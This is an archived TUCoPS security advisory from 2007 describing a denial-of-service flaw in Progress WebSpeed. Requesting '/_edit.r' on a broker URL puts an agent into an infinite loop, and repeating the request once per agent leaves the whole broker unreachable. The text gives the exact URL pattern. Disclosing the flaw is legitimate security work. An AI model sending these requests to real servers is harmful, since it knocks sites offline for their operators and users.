TUCoPS :: HP Unsorted D :: tb10692.htm

Disable website access for sites running Webspeed
Disable website access for sites running Webspeed
Disable website access for sites running Webspeed


_edit.r Busy agents exploit. 1-5-2007
author: Eelko Neven
discovered: 28-4-2007
tested: Windows 2000 server & Windows 2003 server

Because of poor security in _edit.r it is possible to put all agents in busy mode.

First you have to find the messenger execution url. For example:
http://yourmachine.com/scripts/cgiip.exe/WService=wsbroker1 
http://yourmachine.com/scripts/wsisa.dll/WService=wsbroker1 


just add the following to the url:
/_edit.r

your url will look like this:
http://yourmachine.com/scripts/cgiip.exe/WService=wsbroker1/_edit.r 

When you run the above url you put the agent into an infinite loop (Do While). If for instance your server runs 5 Broker Agents you just have to run above url 5 times and then all agents will be put in busy mode. From that moment on it's not possible to access that broker anymore.

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH